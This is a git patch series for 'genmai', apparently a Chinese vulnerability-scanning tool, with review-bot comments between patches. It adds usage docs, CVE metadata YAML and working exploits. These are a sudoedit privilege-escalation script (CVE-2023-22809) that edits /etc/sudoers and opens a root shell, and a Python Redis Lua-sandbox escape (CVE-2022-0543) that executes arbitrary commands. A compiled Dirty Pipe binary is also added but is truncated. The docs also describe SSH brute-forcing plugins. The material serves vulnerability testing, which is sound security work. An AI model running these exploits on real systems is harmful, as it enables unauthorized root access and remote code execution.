From b98f6d17620f5016c60faf51c2d9b3290b682b82 Mon Sep 17 00:00:00 2001 From: hankdamonlee Date: Wed, 8 Mar 2023 15:55:17 +0000 Subject: [PATCH 01/13] =?UTF-8?q?add=20docs/=E4=BD=BF=E7=94=A8=E6=96=87?= =?UTF-8?q?=E6=A1=A3.md.=20=E6=B7=BB=E5=8A=A0=E5=8F=AF=E5=9C=A8=E7=BA=BF?= =?UTF-8?q?=E9=A2=84=E8=A7=88=E7=9A=84=E4=BD=BF=E7=94=A8=E6=96=87=E6=A1=A3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: hankdamonlee --- docs/使用文档.md | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 docs/使用文档.md diff --git a/docs/使用文档.md b/docs/使用文档.md new file mode 100644 index 0000000..7809f29 --- /dev/null +++ b/docs/使用文档.md 
@@ -0,0 +1,31 @@ +genmai工具使用文档 +一.环境搭建: +golang环境大于等于go1.17.2; +python3环境大于等于3.8; +进入src目录下终端导入golang需要引入的库,这里使用 ”go mod tidy” 进行导入库; +进入src目录,使用pip3进行导入需要的python库,这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载(pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple ); + +二.Kernel模块 +kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃,所以这里我们默认poc/exp为低破坏性的,具有破坏性通过匹配内核版本,需人工手动执行exp。 +我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。 + +三.System模块 +system模块为genami中系统漏洞检测模块,其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。 +这里使用 ”go run main.go -system=all”开始系统检测。 +我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。 + +四.Baseline模块 +BaseLine模块介绍及使用: +baseline模块为genmai工具的基线检测模块,基线检查功能通过配置不同的基线检查策略,可以帮助您快速对服务器进行批量扫描,发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。 +可以看出部分基线检测是需要高权限才能检测,这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd,将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。 + +五.插件模块 +1. FastScan(系统漏洞版本匹配,快速扫描) +FastScan是通过匹配版本号的方式,对系统进行快速扫描。这里我们使用了内部数据库,暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。 +配置完成后,我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。 +2. Fofa(fofa获取资产信息) +3. Nmap(Nmap检测端口开放情况) +4. SSHExplosion(ssh快速爆破检测弱密码情况) +5. WeakPwdGeneration(弱密码生成器) + +六.POC/EXP/基线策略添加 From f1992202e8905bed2b49aa9409feb063118b0a7c Mon Sep 17 00:00:00 2001 From: hankdamonlee Date: Wed, 8 Mar 2023 15:55:33 +0000 Subject: [PATCH 02/13] =?UTF-8?q?update=20docs/=E4=BD=BF=E7=94=A8=E6=96=87?= =?UTF-8?q?=E6=A1=A3.md.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: hankdamonlee --- docs/使用文档.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/docs/使用文档.md b/docs/使用文档.md index 7809f29..4616ca7 100644 --- a/docs/使用文档.md +++ b/docs/使用文档.md @@ -1,4 +1,6 @@ genmai工具使用文档 + + 一.环境搭建: golang环境大于等于go1.17.2; python3环境大于等于3.8; 
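Review bot: In the Baseline section of this hunk the procedure tells the operator to put the root password in cleartext into `RootPasswd` in data/BaseLine/BaseLine.yaml and then run `systemctl start ssh` so the checks can log in as root; the doc should say that this file must be readable only by the operator, that the entry has to be cleared after the run, and that leaving sshd up afterwards widens the attack surface of the host being assessed. Two smaller points in the same hunk: the System section spells the tool `genami` (should be `genmai`), and `六.POC/EXP/基线策略添加` is an empty heading, so either fill it in or drop it until the content exists. The follow-up patch in this series only reflows this text into bullets, so both carry through to the final version.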
From b88ed7ced2b371c14e65b9455cd4385712a2e5e1 Mon Sep 17 00:00:00 2001 From: hankdamonlee Date: Wed, 8 Mar 2023 15:57:13 +0000 Subject: [PATCH 03/13] =?UTF-8?q?update=20docs/=E4=BD=BF=E7=94=A8=E6=96=87?= =?UTF-8?q?=E6=A1=A3.md.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: hankdamonlee --- docs/使用文档.md | 37 ++++++++++++++++++------------------- 1 file changed, 18 insertions(+), 19 deletions(-) diff --git a/docs/使用文档.md b/docs/使用文档.md index 4616ca7..768fa52 100644 --- a/docs/使用文档.md +++ b/docs/使用文档.md 
@@ -1,30 +1,29 @@ genmai工具使用文档 -一.环境搭建: -golang环境大于等于go1.17.2; -python3环境大于等于3.8; -进入src目录下终端导入golang需要引入的库,这里使用 ”go mod tidy” 进行导入库; -进入src目录,使用pip3进行导入需要的python库,这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载(pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple ); +一. 环境搭建: +- golang环境大于等于go1.17.2; +- python3环境大于等于3.8; +- 进入src目录下终端导入golang需要引入的库,这里使用 ”go mod tidy” 进行导入库; +- 进入src目录,使用pip3进行导入需要的python库,这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载(pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple ); -二.Kernel模块 -kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃,所以这里我们默认poc/exp为低破坏性的,具有破坏性通过匹配内核版本,需人工手动执行exp。 -我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。 +二. Kernel模块 +- kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃,所以这里我们默认poc/exp为低破坏性的,具有破坏性通过匹配内核版本,需人工手动执行exp。 +- 我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。 -三.System模块 -system模块为genami中系统漏洞检测模块,其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。 -这里使用 ”go run main.go -system=all”开始系统检测。 -我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。 +三. System模块 +- system模块为genami中系统漏洞检测模块,其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。 +- 这里使用 ”go run main.go -system=all”开始系统检测。 +- 我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。 -四.Baseline模块 -BaseLine模块介绍及使用: -baseline模块为genmai工具的基线检测模块,基线检查功能通过配置不同的基线检查策略,可以帮助您快速对服务器进行批量扫描,发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。 -可以看出部分基线检测是需要高权限才能检测,这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd,将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。 +四. 
Baseline模块 +- BaseLine模块介绍及使用: +- baseline模块为genmai工具的基线检测模块,基线检查功能通过配置不同的基线检查策略,可以帮助您快速对服务器进行批量扫描,发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。 +- 可以看出部分基线检测是需要高权限才能检测,这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd,将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。 -五.插件模块 +五. 插件模块 1. FastScan(系统漏洞版本匹配,快速扫描) -FastScan是通过匹配版本号的方式,对系统进行快速扫描。这里我们使用了内部数据库,暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。 -配置完成后,我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。 +> FastScan是通过匹配版本号的方式,对系统进行快速扫描。这里我们使用了内部数据库,暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。配置完成后,我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。 2. Fofa(fofa获取资产信息) 3. Nmap(Nmap检测端口开放情况) 4. SSHExplosion(ssh快速爆破检测弱密码情况) From 692cf38b4e6c2490a7bcbdb7e327a4b8a0bc21a7 Mon Sep 17 00:00:00 2001 From: t1an5t Date: Wed, 8 Mar 2023 08:33:43 +0000 Subject: [PATCH 04/13] update data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml. Signed-off-by: t1an5t --- data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml b/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml index 67cb098..0a19351 100644 --- a/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml +++ b/data/SystemPocs/CVE-2021-3156/CVE-2021-3156.yaml @@ -4,7 +4,7 @@ Belong: system PocHazardLevel: low Source: https://github.com/worawit/CVE-2021-3156 SiteInfo: - Name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。 + Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 Severity: high Description: Sudo before 1.9.5p2 存在缓冲区错误漏洞,攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。 From 0dfc6e09595c14cc88240ca80fdb17d5b86dda7d Mon Sep 17 00:00:00 2001 
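Review bot: The removed `Name:` line in the CVE-2021-3156 hunk is the Polkit/pkexec blurb, which shows this yaml was cloned from the CVE-2021-4034 entry; since only `Name` is touched here, the remaining SiteInfo fields (References, CvssMetrics, ScopeOfInfluence, Tags, Source) should be checked against CVE-2021-3156 as well before this is merged. The Description `Sudo before 1.9.5p2` is correct for this CVE.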
From: pil10w Date: Wed, 8 Mar 2023 17:28:30 +0800 Subject: [PATCH 05/13] Add CVE-2023-22809 check script --- .../CVE-2023-22809/CVE-2023-22809.sh | 41 +++++++++++++++++ .../CVE-2023-22809/CVE-2023-22809.yaml | 45 +++++++++++++++++++ 2 files changed, 86 insertions(+) create mode 100644 data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh create mode 100644 data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml diff --git a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh new file mode 100644 index 0000000..e260f70 --- /dev/null +++ b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.sh 
@@ -0,0 +1,41 @@ +#!/usr/bin/env bash +# +# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation +# +# Exploit Author: n3m1.sys +# CVE: CVE-2023-22809 +# Date: 2023/01/21 +# Vendor Homepage: https://www.sudo.ws/ +# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz +# Version: 1.8.0 to 1.9.12p1 +# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9 +# +# Running this exploit on a vulnerable system allows a localiattacker to gain +# a root shell on the machine. +# +# The exploit checks if the current user has privileges to run sudoedit or +# sudo -e on a file as root. If so it will open the sudoers file for the +# attacker to add a line to gain privileges on all the files and get a root +# shell. + +if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' +then + echo "> Currently installed sudo version is not vulnerable" + exit 1 +fi + +EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-) + +if [ -z "$EXPLOITABLE" ]; then + echo "> It doesn't seem that this user can run sudoedit as root" + read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 +else + echo "> BINGO! User exploitable" +fi + +echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" +echo "$USER ALL=(ALL:ALL) ALL" +read -n 1 -s -r -p "Press any key to continue..." +EDITOR="vim -- /etc/sudoers" $EXPLOITABLE +sudo su root +exit 0 diff --git a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml new file mode 100644 index 0000000..6ecddd1 --- /dev/null +++ b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml 
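Review bot: The version gate in this hunk is wrong: `grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'` matches 1.9.0 to 1.9.9 and 1.9.11 (and odd strings such as 1.9.91) but not 1.9.10 or plain 1.9.12, both inside the affected range `1.8.0 to 1.9.12p1` stated in the header, so the script exits with `Currently installed sudo version is not vulnerable` on those hosts. Compare major/minor/patch numerically plus the `p` suffix instead of a regex. Second, the script is interactive end to end: `read -p "Do you want to proceed anyway?"`, `read -n 1 -s -r -p "Press any key to continue..."`, a `vim -- /etc/sudoers` session the operator has to edit by hand, then `sudo su root`; `sudo -l` may itself prompt for a password. None of this can be driven unattended, and the edit plants a permanent `$USER ALL=(ALL:ALL) ALL` line in /etc/sudoers with no cleanup, so this belongs with the manually run exploits rather than an automated check. If an automated check is wanted, stop after the `sudo -l` parse and report `EXPLOITABLE`. Also `localiattacker` in the header comment should be `local attacker`.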
@@ -0,0 +1,45 @@ +FormatVer: 20230308 +Id: CVE-2023-22809 +Belong: system +PocHazardLevel: low +Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc +SiteInfo: + Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + Severity: high + Description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + ScopeOfInfluence: + sudo@[1.8.0, 1.9.12p2) + References: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + SiteClassification: + CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + CvssScore: 7.8 + CveId: CVE-2023-22809 + CweId: CWE-269 + CnvdId: None + KveId: None + Tags: + - 特权管理不当 +SiteRequests: + Implement: + ImArray: + - Inter : bash + InterArgs : + Exec : CVE-2023-22809.sh + Args : + ExpireTime: #second + + # < input + # > output + # . wait + # ? condition + # : content + # + #组合起来 + # >. 等待直到输出 + # << 输入字符 + # >?判断条件 + Inter: + - ">?:BINGO! User exploitable" #ture + Condition: None From 92c5af3d81b0d62a654fa28649f609f1085344aa Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Thu, 9 Mar 2023 09:28:29 +0800 Subject: [PATCH 06/13] Update CVE-2023-22809 judge method. --- data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml index 6ecddd1..9bd5068 100644 --- a/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml +++ b/data/SystemPocs/CVE-2023-22809/CVE-2023-22809.yaml @@ -41,5 +41,7 @@ SiteRequests: # << 输入字符 # >?判断条件 Inter: - - ">?:BINGO! User exploitable" #ture + - "<<:whoami\n" #ture + - ">.:\n" + - ">?:root" Condition: None From 2d35b06f35d858cfc1533c355c81aa1b68ab7150 Mon Sep 17 00:00:00 2001 
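Review bot: The new judge sequence `<<:whoami\n` / `>.:\n` / `>?:root` cannot succeed against CVE-2023-22809.sh as written: the script's `read -p` and `read -n 1` prompts consume whatever the harness sends on stdin before `sudo su root` ever runs, and the `vim -- /etc/sudoers` step in between needs an operator, so `whoami` is either eaten by a prompt or typed into the editor. Either the script gets a non-interactive path (no `read`, a scripted sudoers edit that is reverted afterwards, then the `whoami` output), or the judge should stay on the `sudo -l` result as in the replaced line `>?:BINGO! User exploitable`. In the same file `PocHazardLevel: low` does not fit an exploit that edits /etc/sudoers, and the `#ture` comment should read `#true`.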
From: xuwenhan Date: Wed, 8 Mar 2023 20:30:50 +0800 Subject: [PATCH 07/13] add CVE-2022-0543 --- .../SystemPocs/CVE-2022-0543/CVE-2022-0543.py | 30 +++++++++++ .../CVE-2022-0543/CVE-2022-0543.yaml | 53 +++++++++++++++++++ 2 files changed, 83 insertions(+) create mode 100644 data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py create mode 100644 data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml diff --git a/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py new file mode 100644 index 0000000..571116f --- /dev/null +++ b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.py @@ -0,0 +1,30 @@ +import redis +import sys + +def echoMessage(): + version = """ + [#] Create By :: + _ _ ___ __ ____ + / \ _ __ __ _ ___| | / _ \ / _| | _ \ ___ _ __ ___ ___ _ __ + / _ \ | '_ \ / _` |/ _ \ | | | | | |_ | | | |/ _ \ '_ ` _ \ / _ \| '_ \ + / ___ \| | | | (_| | __/ | | |_| | _| | |_| | __/ | | | | | (_) | | | | + /_/ \_\_| |_|\__, |\___|_| \___/|_| |____/ \___|_| |_| |_|\___/|_| |_| + |___/ By https://aodsec.com + """ + print(version) + +def shell(ip,port,cmd): + lua= 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("'+cmd+'", "r"); local res = f:read("*a"); f:close(); return res' + r = redis.Redis(host = ip,port = port) + script = r.eval(lua,0) + print(script) + +if __name__ == '__main__': + echoMessage() + ip = "127.0.0.1" + port = "6379" + while True: + cmd = input("input exec cmd:(q->exit)\n>>") + if cmd == "q" or cmd == "exit": + sys.exit() + shell(ip,port,cmd) diff --git a/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml new file mode 100644 index 0000000..ab442bd --- /dev/null +++ b/data/SystemPocs/CVE-2022-0543/CVE-2022-0543.yaml 
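Review bot: `shell()` in the CVE-2022-0543.py hunk has no error handling: on a Redis that is not affected (where `package` is absent from the Lua sandbox) or that requires AUTH, `r.eval` raises a `redis.exceptions.ResponseError` subclass, the loop dies with a traceback, and the harness sits on the `>>` prompt until ExpireTime; catch the exception, print a clear not-vulnerable line and exit non-zero. The command is also spliced into the Lua source unescaped (`io.popen("'+cmd+'", "r")`), so any `"` in the input breaks the script. Smaller points: `port = "6379"` should be an int, the path `/usr/lib/x86_64-linux-gnu/liblua5.1.so.0` is fixed to the x86-64 Debian/Ubuntu multiarch layout with no fallback, and `ip`/`port` are hard-coded instead of being taken from the yaml `Args`.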
@@ -0,0 +1,53 @@ +FormatVer: 20230306 +Id: CVE-2022-0543 +Belong: system +PocHazardLevel: low +Source: https://github.com/aodsec/CVE-2022-0543 +SiteInfo: + Name: Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 + Severity: critical + Description: + Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数,即可获得io库,再使用其执行命令。 + ScopeOfInfluence: + 2.2 <= redis < 5.0.13 + 2.2 <= redis < 6.0.15 + 2.2 <= redis < 6.2.5 + References: + - http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-0543 + SiteClassification: + CvssMetrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + CvssScore: 10.0 + CveId: CVE-2022-0543 + CweId: None + CnvdId: None + KveId: None + Tags: + - cve2022 + - redis + - RCE +SiteRequests: + Implement: + ImArray: + - Inter : python3 + InterArgs : + Exec : CVE-2022-0543.py + Args : + ExpireTime: #second + + # < input + # > output + # . wait + # ? condition + # : content + # + #组合起来 + # >. 等待直到输出 + # << 输入字符 + # >?判断条件 + Inter: + - ">.:>>" #ture + - "<<:whoami\n" + - ">.:\n" #等待输出'\n' + - ">?:root" + Condition: None \ No newline at end of file From 9543c11f7ff42116e7838991b62874fa5e963be3 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Thu, 9 Mar 2023 09:56:56 +0800 Subject: [PATCH 08/13] Update Systempoc main yaml. --- data/SystemPocs/SystemPocs.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/data/SystemPocs/SystemPocs.yaml b/data/SystemPocs/SystemPocs.yaml index cb68ec7..66408bf 100644 --- a/data/SystemPocs/SystemPocs.yaml +++ b/data/SystemPocs/SystemPocs.yaml 
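Review bot: `ScopeOfInfluence` in this hunk lists upstream Redis ranges (`2.2 <= redis < 5.0.13` and so on) while the Description correctly says the bug is in the Debian/Ubuntu packaging of the Lua sandbox, not in upstream Redis; a from-source 6.2.4 is not affected and a patched distribution package with an older upstream version number is. State the affected distribution package versions instead. The judge `>?:root` is also wrong for this PoC: `io.popen` runs as the redis-server process user, which on Debian/Ubuntu packages is `redis`, so `whoami` returns `redis` and the check reports not vulnerable on a successfully exploited host; judge on command execution (for example `id` output containing `uid=`) rather than on root.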
@@ -11,4 +11,5 @@ ExplorerItems: - ConfigFile: CVE-2021-3560/CVE-2021-3560.yaml - ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml - ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml - - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml \ No newline at end of file + - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml + - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml \ No newline at end of file From e1303018478fbdee5f6ef5026c4ff5639f122c98 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com> Date: Wed, 8 Mar 2023 23:54:44 +0000 Subject: [PATCH 09/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-0847?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- data/KernelPocs/CVE-2022-0847/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 data/KernelPocs/CVE-2022-0847/.keep diff --git a/data/KernelPocs/CVE-2022-0847/.keep b/data/KernelPocs/CVE-2022-0847/.keep new file mode 100644 index 0000000..e69de29 From c71baa94c9eec3234a4cf146a3f2a538bedad054 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com> Date: Thu, 9 Mar 2023 00:01:22 +0000 Subject: [PATCH 10/13] add files Signed-off-by: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com> --- data/KernelPocs/CVE-2022-0847/CVE-2022-0847 | Bin 0 -> 13328 bytes data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c | 179 ++++++++++++++++++ .../CVE-2022-0847/CVE-2022-0847.yaml | 38 ++++ 3 files changed, 217 insertions(+) create mode 100644 data/KernelPocs/CVE-2022-0847/CVE-2022-0847 create mode 100644 data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c create mode 100644 data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml 
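Review bot: Both sides of this SystemPocs.yaml hunk end with `\ No newline at end of file`, so every new `ConfigFile:` entry shows up as a deletion plus re-addition of the previous last line (it happens again in patch 12 of this series); add the trailing newline once so future additions are one-line diffs.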
diff --git a/data/KernelPocs/CVE-2022-0847/CVE-2022-0847 b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847 new file mode 100644 index 0000000000000000000000000000000000000000..4c6bbdd3d126b770e71cdc8f78670ba132ad4407 GIT binary patch literal 13328 zcmeHOdvH|Oc|VIJkTFQ&8TmoD#*hj(S}mA|1jW$`R=)BGgE4Yx3SL&bccnF}-Rz3g_ndq5=|Feq9FIqEsuB+g;wI)>NV^hT{J6@1 zw2M}82d*o`y<#r-YKd9$c8fr2rD^4wX|2MmK*_Fkjs>{sy-JTMM@Y0r$;y%1Oq0d6nAbl8T?Hs;+2>$9gwyXo*Lf;LlgU(-rXj74SzY z;LR0q8ZYJIq{b+RKT!dHtO7n(0e=IyhMzlq9YDEqKT-jw+q0bheHHLKE8u@n0e=^` zhMzkP0$Ak+!P7V`7f%@YBGD)`O+!uyzOMzweVB&%CSeT5Ok9lcVG&KHjD$$VQiezw z>2xwJQdu)2g29X#3LgrF`ws=9p;%mmdXs5WMEeXgEHY*~4x_XYiijxG!y+1vCo={F z5%>_9R6G_oMD$2HW*Tr69t;Jeu|y~yI|?+MFyjCz8Y(1h1_wg11d!+;SW`UQ-PN%@ zxZb;=l-pR!t@mye!LGeKgDA)7i)BnBy?5vKcrsz^4fV#UtiFL{Lb(lEs$~_?E_9z( z;mUv2r5s5ZCCVH!NFG>uKzSZo8jCHY8S_PjEt7ne_@3gkcgOA^4?hA=iRW$ZmkAmu zNWK-Cq>K+Myw=r^%wJk*>C@avF><0u8;*fdO5d>IJa$OI5?(?oI2k8rJD z*^V6X{bX6VTtr&)J>seB3l}B-9pY(d7A7SBP2ytTu4d&DDl*_g@ck$6Hi@Q*e&^|h^MYBv`fC1cGj(Y1?epdQFaF%*$hKK#nNpWoBKY;Y;Yj43` zKXa=}&rRuPCO@Hj&gnnBWj4a$7nQ>W^m z5eb|>3&VWi=Gws35vXU+Ne@$3e9FU=@-USPOy_&1$wQvn?ZOgi{nyfZdTn58 zmRr>PD<$=9P_I8ddWE9OAD7N^KZC}Pod)FpnA93RMY_f81)DqFQnswmPqqRzBqWcLEeU~D7<9}pC5<+>)$R;=1NE&%*x~7PG4C6Wb0EXhG#Tp!(`C$wE zou+!i&6mi{80=0GP&kb#Mw#jhrR~Us2QKNRM%5@9h-Cqui@=+#q9oZWwLV29{bZ3< z(r?>J+D9ebUn+@~LU2Vrc^X;>OpU||)G0T575K<0x{4v{piZ*>F+^6J%gK7|_(2q( zm%6%a@NWUeNGF5)$l%K*gEvtN6Vm1}$T84C1%73fE8f!@HhI(f8Y`Ipi%Fs`@B z+RFM}ZO~*(uC$q5CbR7&Gn355Mq8bzA+59a;`B51~ z{ z#XMblme7+#&%KkoC8wIg8F)vpp)C1kKvkf3KGYAX1xtjMR49`<5|Mld))BEppO#H& zHj!o~wH9+Ar8K?0p+lP2>lJBnM7VI#i3NxeAq!fp*u78zZmH9$5L;HSTOCT6gUy*_ zcy+4lNa~RzJ9mbYM>9QxesfQ#b>k8579ajhBV%r9Nhg!I_Qnz|8TslU#N&o(Qv4** zWWADU8O$p7x{3l9k0;aVp^t0fP$B_Exw6q{1w^(XQwzbi&(M04*+e9i9-8mcmun?0 z6iz2Inc2Fs-n0%gB3NX>o61xDcSWNa!_;CKjmnKBGO>uEnf-JeKbVV$pQCxK&$RwwKa@k1jDr|nLrQsg<)Z^Yv; z*P7DVgceQ?41^L9YM&!(;ZcRYb(QQ=kr~1=a-eCg7R@HYW-JMVP&}?>3}YZeW3E4R z7;R|{!7X^Od+w>)N_$xJ;yL|Zv3LTs^?I>50jh)cgYLOeEM5X#iW_AbbPzLXBWAiu 
